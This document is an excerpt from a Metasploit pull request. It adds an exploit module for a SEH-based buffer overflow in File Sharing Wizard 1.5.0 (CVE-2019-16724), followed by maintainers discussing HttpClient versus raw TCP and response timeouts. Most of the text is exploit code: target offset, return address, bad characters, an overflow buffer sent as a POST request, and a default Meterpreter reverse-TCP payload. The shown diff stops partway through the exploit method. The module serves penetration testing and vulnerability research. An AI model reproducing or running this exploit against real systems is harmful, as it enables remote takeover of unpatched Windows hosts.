modules/exploits/windows/http/file_sharing_wizard_seh.rb

```diff
@@ -0,0 +1,57 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super update_info(info,
+                      'Name' => 'File Sharing Wizard 1.5.0 - POST SEH Overflow',
+                      'Description' => %q(
+        This module exploits a SEH based buffer overflow in an HTTP POST parameter in File Sharing Wizard 1.5.0
+      ),
+                      'Author' => [
+                        'x00pwn', # Original exploit
+                        'Dean Welch <dean_welch[at]rapid7.com>' # Module
+                      ],
+                      'License'        => MSF_LICENSE,
+                      'References'     =>
+                          [
+                            %w(CVE 2019-16724),
+                            %w(EDB 47412)
+                          ],
+                      'Payload' =>
+                          {
+                            BadChars: "\x00\x20"
+                          },
+                      'DisclosureDate' => '2019-09-24',
+                      'DefaultOptions' =>
+                          {
+                            RPORT: "80",
+                            PAYLOAD: 'windows/meterpreter/reverse_tcp'
+                          },
+                      'Platform'       => 'win',
+                      'Targets'        =>
+                          [
+                            ['Win7 x86', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }]
+                          ])
+  end
+
+  def exploit
+    buf = rand_text_english(target['Offset'], payload_badchars)
+    buf << generate_seh_payload(target.ret)
+    payload_header = "POST " + buf
```

Comment:
Can `HttpClient` be used instead?

Reply:
It's probably overkill for this, but I'm curious. No URI normalization should occur by default.

Reply:
Not really familiar with the httpclient yet, would there be a benefit to using it here?
Taking a look at it and I don't really think it's what we would want, seems to have a lot of extra boilerplate stuff which might interfere with what we have here? not sure honestly

Reply:
It just makes your life easier, and it's a dedicated API for HTTP. I think you're fine not using it here, but we prefer to use the closest API as possible. Note that using `HttpClient` will offer HTTP evasions, which the `Tcp` mixin does not provide. That's another benefit.

Reply:
very strange stuff going on, tried using httpclient (wanted to use it for the check anyway) and I'm still able to get a session but it takes a lot longer, not sure why, the only difference in the request are the extra metadata stuff like user agent and content type

Reply:
figured it out, needed to change the timeout since we don't need to wait on a response

Reply:
Looks like #12007 worked for you. Great!

Reply:
Typically, the HTTP server process will block on executing your code, which is why waiting for the response times out.